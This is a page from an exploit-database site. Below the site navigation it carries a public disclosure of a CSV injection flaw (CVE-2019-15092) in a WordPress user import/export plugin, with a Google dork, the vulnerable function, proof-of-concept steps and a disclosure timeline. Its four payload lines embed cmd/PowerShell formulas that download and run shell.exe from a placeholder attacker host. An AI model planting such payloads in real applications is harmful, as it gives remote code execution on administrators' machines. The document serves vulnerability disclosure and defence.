0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Import Export WordPress Users 1.3.1 Plugin - CSV Injection Vulnerability
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection # Exploit Author: Javier Olmedo # Contact: @jjavierolmedo # Website: https://sidertia.com # Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce" # Vendor: WebToffee # Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip # Affected Version: 1.3.1 and before # Active installations: +20,000 # Patched Version: update to 1.3.2 version # Category: Web Application # Platform: PHP # Tested on: Win10x64 # CVE: 2019-15092 # References: # https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/ # https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 # 1. Technical Description # Wordpress Plugin Import Export WordPress Users version 1.3.1. and before are affected by Remote Code # Execution through the CSV injection vulnerability. This allows any application user to inject commands # as part of the fields of his profile and these commands are executed when a user with greater privilege # exports the data in CSV and opens that file on his machine. # 2. Vulnerable code # The function do_export() from WF_CustomerImpExpCsv_Exporter class does not check if fields beggings # with (=, +, -, @) characters so the fields name, surname, alias or display_name are vulnerable to CSV Injection. # 3. Proof Of Concept (PoC) # 3.1 Login with subscriber user and change the fields First name, Surname and Alias with payloads. # 3.2 Login with a high privileges user and export all users to CSV. # 3.3 When the user with high privileges logs in to the application, export data in CSV and opens the # generated file, the command is executed and the shell will run open on the machine. # 4. Payloads =cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 +cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 -cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 @cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 # 5. Timeline # 15, august 2019 - [RESEARCHER] Discover # 15, august 2019 - [RESEARCHER] Report to Webtoffee support # 16, august 2019 - [DEVELOPER] More information request # 16, august 2019 - [RESEARCHER] Detailed vulnerability report # 19, august 2019 - [DEVELOPER] Unrecognized vulnerability # 22, august 2019 - [RESEARCHER] Public disclosure # 0day.today [2024-11-16] #